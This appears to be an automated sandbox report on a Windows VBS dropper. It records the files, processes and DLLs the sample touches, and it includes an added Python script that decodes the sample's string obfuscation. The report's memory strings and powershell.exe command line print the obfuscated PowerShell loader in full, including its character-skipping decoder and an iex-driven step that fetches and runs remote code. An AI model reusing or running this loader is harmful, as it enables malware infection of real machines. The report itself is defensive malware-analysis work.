kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVars
        Source: wscript.exe, 00000000.00000003.2065521032.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065617903.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065880121.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065571506.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065772832.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065828358.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2068422793.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065723435.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065310773.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2065935132.000001B9DDC15000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2064728689.000001B9DDC13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slNy
        Source: wscript.exe, 00000000.00000003.2068507383.000001B9DBDB8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue clersU,der ');$Anandrarious=Skdefrakker 'Sp.li$AdjurW oadwaStod.u EgenbHjerneDyreheBrkrenSuper2Letma0.endr5Abumb.AlfabD SubooTilstwColl.nStrawlDartsoDatafaK,atodCountFA,kfoiTeks l amleVa ge(fas i$ SociGB,achuSalt.aUndsilKldebaMargic FuldaOrigi,Liste$PensiSDecorkTraady vampgSkolegAccene enfamCar io ssenrCo ioeHorselvarios D st)Alfab ';$Skyggemorels=$Radioactive[0];Hadaway (Skdefrakker 'Grupp$BortcgHy nalLoud.oFrigobrinseaAntirle ide: Jikus Baccl Hindi SanigSer ehSpunctMiljtiTa 
honFare,eLeis.s kseksEks,r=O,ele(Ind,tTPyro e Car,s .vint Sens-Re.eiPBiquiaPeri.tUnskeh Bela Folke$CygniS OverkBind yInscrgHewetg loodeBrobumCh,onoMisi.rEarp.eLil.elLystrsMercu)Appet ');while (!$slightiness) {Hadaway (Skdefrakker 'Samme$Gim,egMonosl R,nkoBedwebBe.enaInds,lSalvi:,etalaLittegPropegV ilir.astraOpremnSago.d Fa,tiprovizstatsa.uficbRvep lCyphoe .qui=Dri t$Pheret,iennrHik,tu ,espeOpret ') ;Hadaway $Anandrarious;Hadaway (Skdefrakker 'UdbulSUngagtAalega eth.rUndertSerpe-XvidoS.picll Vek.etordeeAmmunpF rma L,rsp4 Plan ');Hadaway (Skdefrakker ' Alla$IndbegSudbul avedotum,ib Propa The.lSamme:TitlesFra elLam.diFemalgg.nerhP radt ,ubai StennT,peleParassSpeeds Bico=Sadel(,ejtrT assieenergsFolketM hit-Am,lyPTrolla .onit EpidhFremm W lac$Gis eS TastkDataby s,migRec.pg esteCoed,mForlioPhantrUnbodeKlasslWarrasSva g)Int,r ') ;Hadaway (Skdefrakker 'Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$
        Source: wscript.exe, 00000000.00000002.2069459445.000001B9DBE29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe ') ;$Gualaca=$Dervishlike[$Emarginate];}$Romantikers=288577;$Gabions=28318;Hadaway (Skdefrakker '.ksem$PastogBarmflEltr oAppelbU guiablundl Cr,m:CarduT ysteeMicroeIn,bum Garas Seto Parro= Cell AlkohGPens eConcet alle- TravCOptimoRug mnBrnd.tTppebeSammenmanertBrand Filic$WhitiSDi.idkSjakay Suspg,nimagBlueseOxla.mRe,eroApo.hrUnowneAnalylVedersHexad ');Hadaway (Skdefrakker 'Reawa$medvigAmneslUnsluo raksbForena,astblVicep:DiachCOversoHamardUndsleJern v P.coeB,oodlVegetoUnderpCoun.eBtteprChroms.epro Retha=Sup r Geusi[T rkiS AdelyCatabsAtmoctGgemmeBumblm Mil,.bl,odCProkuoMervrnF.siov.onpreFors rW opstBayre] unsp:Septi:KeirsF PercrOno aoTeak.mviru,B CiviaSolifs aarseLibe,6 .log4FreshSDemeatRavnerKajakisnowmn UdspgAmtsf(Ca.bu$ hydrTSongheforneeKnaphm,ovedsE.der)Jeete ');Hadaway (Skdefrakker 'Sekte$Impalg sa.ulBreadoFin,rbKodnia benzlVrik.: UnheGOxygesSinuot MillgMoiseiavnervkalasePrunkrSljfe Selv=Strm Grug[SaulqS andaySpejls To.ot SkoleTedesm Fnu . 
cardToutjueCalvixQasidtz,chi..eninEGennen NattcIntrooUdmaadVove,iAnvennMed.cgommbl] D.ss:Sneb,:Alb,rAFlustSA,owrC A.stIU.jetI diff.fodboGE,ilaeWeapotElec STyr,etbudstr BridiChappn Hel,gTol a(Abuli$ KarrCOktroo RededGrouneAfsnrvHjerteEarp l B leo ,oelp Ket.e Da arDivagsEmiel)Reall ');Hadaway (Skdefrakker 'opha,$Ce teg SkomlPlanloSka db StulahouselJeani: MateAPolionSids tH llwi Windn S iniVerd,hFecu,iPeartlTechniAnstdsPalm mS ici=Remin$Bed dG Ma,nsAc,tetBadesgNondeiLarynv MormePack.rAegir.Hive.s ConjuUdvikbKvad s silktantisrFodsaiUnprenGenregMiner( Dupl$ S.iaR Unhooskat.mmultiabetorn.hagotJunkii Lovmk A.kveK.rsfrAz ots Pseu,Gloss$TidskGsk.ldaHedesbMagtai OldkosanctnAd ecsDe.it) Op,u ');Hadaway $Antinihilism;"
        Source: powershell.exe, 00000002.00000002.2185875177.0000023E00228000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Do.su$ DemegAfprvl Pro.o overbSekt a Baktl onsa:FemaaERibromEulyta P,durSukkegSpretiPreconUl.ona Is ttTriadeSickl=Hilly$Cinctg Sk.slNylonoInfekbBrugeaRedi.l Morp:metapgPotameOutfinTeirenVugg e KoncmPolyga t,burMuttebGalope Gra.jPerfodBundeeSalpilHypofsDige.eDis asBilag+Afsnr+Na bo%Afvig$ ivaD Sv.geVarsor.onsivDdniniNotaesut lih Verbl.runkiAld,rksignaeUnder. LimiclyskooIldneuFotognHydrot Appe
        Source: classification engine | Classification label: mal100.troj.expl.evad.winVBS@6/4@1/1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Dsene.Kne
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3220:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jnp5ywv5.3x4.ps1
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
        Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-35235235523525235252532535Selvfinansieret.vbs"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
        Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Megampere='Sub';$Megampere+='strin';$Sensualistiske = 1;$Megampere+='g';Function Skdefrakker($Gyldigt){$Doors=$Gyldigt.Length-$Sensualistiske;For($Papirtigerne=5;$Papirtigerne -lt $Doors;$Papirtigerne+=6){$Reoxygenize+=$Gyldigt.$Megampere.Invoke( $Papirtigerne, $Sensualistiske);}$Reoxygenize;}function Hadaway($Awiggle){ & ($Feeblenesses) ($Awiggle);}$Allitterationernes=Skdefrakker ' InveMUnstaozithazFort.i .ontlAcro.lWo riaOffen/,odel5Snf,e. Svir0Apag. Medle(F aktWAlureiAngwin Salpd fortoAkti wFo,eosDeval ,latfNgrozaT Midt Teleg1Sa.pe0Di,se.bedir0Franc; Toxi Non.WSlur iDerkrnmaner6Qui.q4 Tids; Spaa DiffxAde,o6Non.q4Bedri;fogus Skivr,lommvSlagl:incom1Sti l2 Cy,t1Pundu.Paran0Still),asto LadeGSangueunp,rc ,ithkRoop oPreco/,enom2Besva0Covis1 Inno0Pudsi0Harpe1 B.mp0In,an1Chait GotthFPrikkiSlfanrDrapfeHy,stfPeakioB.gcaxNoi.e/Sanit1Van b2furil1Klept.Augus0Cente ';$Unresponsible=Skdefrakker 'I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k ';$Gualaca=Skdefrakker 'SowabhSubtotFedtetAnsatpElizas Forr: uci/Fakul/ ChrorE.togaRecormBenzoiBlundrMozegeCentaxKo le.Grun r LogfoFo,dl/Sli euSchatn,nterp AerorRespoiFnugln MinicLogiciUnderpAquarl.iiiseT.ividR.gti.SketcsVir.eeTr usapaala ';$sacrum=Skdefrakker 'Llers>Frugt ';$Feeblenesses=Skdefrakker 'BulimiRemaie vi.txBryll ';$Lophiostomous='Westfilms';$Opkrsler250 = Skdefrakker ' Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrktStendaSangu%Slumm\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dereHarmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday ';Hadaway (Skdefrakker ' Fors$V lgrgRkeb lSherroStophbOverfaBisexllustr:Mumb.REksemaHaremdStilbiOvereoOtosaa DublcToneatMac.si Out.vSamboePiloc=Prism(DishwcLoo emChiqudblake Ant,t/.gnencSdigh Faste$ GemsOStatsp ugebkDublirPreens paralExceseDimenrInco.2ind.a5Klas,0T,ana)M,rkw ');Hadaway (Skdefrakker 'Exfig$ Afmag EstolRekogoPropubPlopsaOrloglBange:.eglvDDoorkeCel irGourmvMa,kei GasosPolith Anthl At miNonphkrenuleRekto= Sl.m$CorslG Lillu SteraT.ykplAgraraAdrescBartea Tran.Wo ris.ontop GrealAx.nei Par.tStjfl( Peri$mutins Al,uaStalic ,ytirE.trauBreakmConci)Unmov ');$Gualaca=$Dervishlike[0];$Mayaca= (Skdefrakker 'Com,r$ IntrgO.erllTra hoSdva b,kohoaU,dullSortk: Kon.W Iba.a No puadvanbgerodeN.areeTilbunHexac2S.der0Tima 5Dan e=PuttiNForgje Intew Sm d-H.smaO JunkbTorpej HomoeF rticMisceteurok H,roiSPantiyNabonsAntebtWakaseGrif,mHeste.obtruNop,ege ScrutAngri.R.chrWfr kee BldsbRearrCNondelselekiBolige,radan Cognt');$Mayaca+=$Radioactive[1];Hadaway ($Mayaca);Hadaway (Skdefrakker 'Nytte$Opka WEle,eaStblouUdtr,b Klone Cla,eproctnGasbo2tilhy0Echin5Neuro.Gli,sHSup re uninaBoligdFremfeMisjorFingesDater[Bankv$hi,liU SnounleggirAcroteGr,ndsFond.p,rodeoHovednCrosssMichei gobebShuddlWodeleMaa e]Guill=Vanfu$PenneA ki slante lInteriFictit Uri,tpred.e Drkir,oamba OutwtHauboiVehemoArmo n Ge be Semir Moden Wofue c
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Dsene.Kne && echo t"
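The powershell.exe command line in the process tree above carries the whole string-decoding scheme the dropper relies on: `$Megampere` is assembled into `Substring`, `Skdefrakker` walks its argument from offset 5 in steps of 6 and keeps one character per step (the five characters before it are filler), and `Hadaway` hands each decoded string to `iex`, itself the decoded value of `$Feeblenesses`. The Python below is an added analyst tool, not code from the sample or from Joe Sandbox: it re-implements that decoder, pulls every `Skdefrakker '...'` literal out of a command line, and flags literals whose length is not a multiple of six, which is what a literal copied from the rendered report looks like when HTML rendering collapsed a double space (a decoded space followed by filler that starts with a space). The inputs are the `$Unresponsible`, `$Feeblenesses`, `$sacrum` and `$Opkrsler250` literals copied from the command line in this report; `SAMPLE_CMDLINE` is constructed from those fragments for the demonstration.

```python
"""Decoder for the string-obfuscation scheme used by the PowerShell stage in
this report.  Added analyst tooling: not code from the sample or from Joe
Sandbox.

The command line defines, in effect:

    $Megampere = 'Substring'; $Sensualistiske = 1
    Function Skdefrakker($Gyldigt) {
        $Doors = $Gyldigt.Length - 1
        For ($i = 5; $i -lt $Doors; $i += 6) { $out += $Gyldigt.Substring($i, 1) }
        $out
    }

Every sixth character, starting at offset 5, is real; the five characters in
front of it are filler.  Offset Length-1 is never read, so a well-formed
literal is 6*k characters long and decodes to k-1 characters.
"""
from __future__ import annotations

import re

# Matches each obfuscated literal handed to the decoder, e.g. Skdefrakker 'abc'.
CALL_RE = re.compile(r"Skdefrakker\s+'([^']*)'")


def skdefrakker(encoded: str) -> str:
    """Python equivalent of the sample's Skdefrakker(): keep offsets 5, 11, 17, ...
    that are strictly less than len(encoded) - 1."""
    return "".join(encoded[i] for i in range(5, len(encoded) - 1, 6))


def is_well_formed(encoded: str) -> bool:
    """Length must be a multiple of six (five filler plus one real character per
    step, plus the unread trailing character).  A literal copied from the
    rendered report fails this when HTML rendering collapsed a double space,
    i.e. a decoded space followed by filler that itself starts with a space;
    from that point on skdefrakker() returns filler instead of real characters."""
    return len(encoded) % 6 == 0


def decode_calls(powershell_text: str) -> list[tuple[str, str, bool]]:
    """Return (encoded, decoded, well_formed) for every Skdefrakker call, in
    order of appearance."""
    results = []
    for match in CALL_RE.finditer(powershell_text):
        encoded = match.group(1)
        results.append((encoded, skdefrakker(encoded), is_well_formed(encoded)))
    return results


# Literals copied verbatim from the powershell.exe command line in this report.
UNRESPONSIBLE = "I.ddaUGrappsElbapeHovedrInten-AdskiA Rel.gAgerbeUns,rnFluort In,k "
FEEBLENESSES = "BulimiRemaie vi.txBryll "
SACRUM = "Llers>Frugt "
# Also copied from the command line as rendered on the page; two double spaces
# were collapsed there, so its length is 208 rather than a multiple of six.
OPKRSLER250 = (
    " Lo he TralcUdholh JagtoFreda Brune%Se.weaBrne,pD.iftpChokpdV.lutaOptrkt"
    "StendaSangu%Slumm\\ or dDStandsAbette ,nken S lgerorsc.AramiKopponnU,dere"
    "Harmo in,on& A zo&Ko ku Va,deOverpcUnde.hSco,ooSkopu DeputFeday "
)

# Constructed for the demonstration from the fragments above; the real command
# line wraps each literal the same way but runs to several thousand characters.
SAMPLE_CMDLINE = (
    "$Unresponsible=Skdefrakker '" + UNRESPONSIBLE + "';"
    "$Feeblenesses=Skdefrakker '" + FEEBLENESSES + "';"
    "$sacrum=Skdefrakker '" + SACRUM + "';"
    "$Opkrsler250 = Skdefrakker '" + OPKRSLER250 + "';"
)

if __name__ == "__main__":
    for encoded, decoded, ok in decode_calls(SAMPLE_CMDLINE):
        note = "" if ok else f"   <-- length {len(encoded)} is not a multiple of 6; re-copy from the raw script"
        print(repr(decoded) + note)
```

Run it against the command line as captured in the process tree or against the raw .vbs rather than against the rendered HTML. The first three literals pass the length check and decode to `User-Agent`, `iex` and `>`; `$Opkrsler250` is flagged because two double spaces were collapsed on the page. Its first 28 decoded characters are still `echo %appdata%\Dsene.Kne && `, the start of the cmd.exe line the report shows powershell.exe spawning, and everything after the first collapsed space decodes to filler. A flagged literal has to be re-copied from the raw script before its decoded value (for instance the download URL in `$Gualaca`) can be trusted.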
        Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
